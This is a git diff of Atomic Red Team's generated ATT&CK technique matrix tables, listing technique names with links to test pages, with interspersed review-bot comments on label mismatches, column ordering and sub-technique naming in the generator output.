+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
+| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
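Review bot: the defense-evasion cell `[Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)` on the added row whose persistence cell is `[Boot or Logon Autostart Execution: Login Items]` pairs a collection-style display name with a T1070 link, while every other T1070.* cell in this table is labelled `Indicator Removal on Host: ...` (Clear Command History for T1070.003, Timestomp for T1070.006). Since these matrices are generated, the display name should be fixed where the generator reads it (the technique's own metadata) and the index regenerated, rather than patched in this file; as it stands the matrix carries a label a reader cannot reconcile with the link target.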
@@ -65,6 +66,7 @@
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
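Review bot: the new `Polymorphic Code` row lands between `Run Virtual Instance` and `Subvert Trust Controls`, which shows the defense-evasion column has no ordering; with unordered columns each added technique sits at an arbitrary position and, whenever a column grows, whole blocks of rows are re-emitted (as the run of replaced rows earlier in this patch shows), which hides the actual change. Suggest having the generator sort each tactic column by technique ID or name before writing the matrix so future index diffs are limited to the rows that changed.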
@@ -76,7 +78,9 @@
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
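Review bot: the two added rows, `Relocate Malware` and `Masquerade Account Name`, are emitted as bare names, while the neighbouring `Hide Artifacts: Hidden Window` cell uses the `Parent: Sub-technique` form; if these are sub-techniques, the generator should emit their display names with the parent prefix so a reader can tell from the matrix which parent technique they belong to. The CONTRIBUTE A TEST links themselves match the rest of the table.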
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 237801e633..aa329754c8 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -5,114 +5,116 @@
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Device Driver Discovery](../../T1652/T1652.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
